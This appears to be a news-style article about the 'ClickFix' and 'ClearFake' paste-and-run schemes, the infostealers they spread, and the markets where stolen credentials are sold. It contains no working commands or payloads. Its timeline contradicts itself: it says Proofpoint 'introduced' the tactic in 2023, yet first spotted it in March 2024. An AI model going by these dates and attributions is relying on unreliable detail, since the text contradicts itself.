In recent years, social engineering tactics have evolved to become more sophisticated, with schemes like “ClickFix” and “ClearFake” emerging as prominent threats. These tactics, often referred to as “paste-and-run,” involve tricking users into executing malicious code by presenting them with deceptive scenarios, such as a broken link or video that requires a fix. Introduced by cybersecurity firm Proofpoint in 2023, these strategies have gained traction among both financially motivated cybercriminals and nation-state actors, leading to widespread malware infections.

Initially spotted in March 2024, paste-and-run tactics have been embraced by various threat actors, including notorious groups like APT28, also known as Fancy Bear. These groups leverage the tactic to distribute information-stealing malware, which harvests sensitive data from compromised systems. This data, often including credentials for cryptocurrency wallets, bank accounts, and other critical services, is then sold on cybercrime markets. The rise of such attacks has significantly contributed to the proliferation of infostealers, with Group-IB reporting a surge in related infections.

Infostealers are a significant concern due to their ability to extract valuable data, which is then sold on platforms like “clouds of logs” and Telegram channels. These illicit markets thrive as ransomware groups and initial access brokers seek high-quality credentials to facilitate further attacks. In 2024 alone, Flashpoint reported a staggering 3.2 billion credentials were stolen, highlighting the scale and impact of these operations. With a variety of infostealers in circulation, such as Lumma, RedLine, and Arcane, the threat landscape continues to evolve, posing ongoing challenges for cybersecurity defenders.

The global menace of ClickFix and similar tactics is exacerbated by attackers’ continuous refinement of their methods. Earlier iterations exploited fake browser updates to distribute malware, but by late 2023, attackers began employing tactics like “EtherHiding,” which utilized obfuscated payloads stored in the BNB Smart Chain. These tactics often involve fake security prompts, such as reCAPTCHA challenges, to persuade users to execute the malicious code. Spear phishing, malicious advertising, and SEO poisoning are common methods for driving traffic to these deceptive pages.

The prevalence of ClickFix pages has surged, with Group-IB documenting a significant increase in malicious and legitimate domains hosting these attacks. This trend underscores the effectiveness and popularity of such tactics among threat actors, who continue to refine their strategies to deceive users and achieve their malicious objectives. As these schemes become more frequent and sophisticated, the cybersecurity community must remain vigilant in developing countermeasures to protect users from these evolving threats.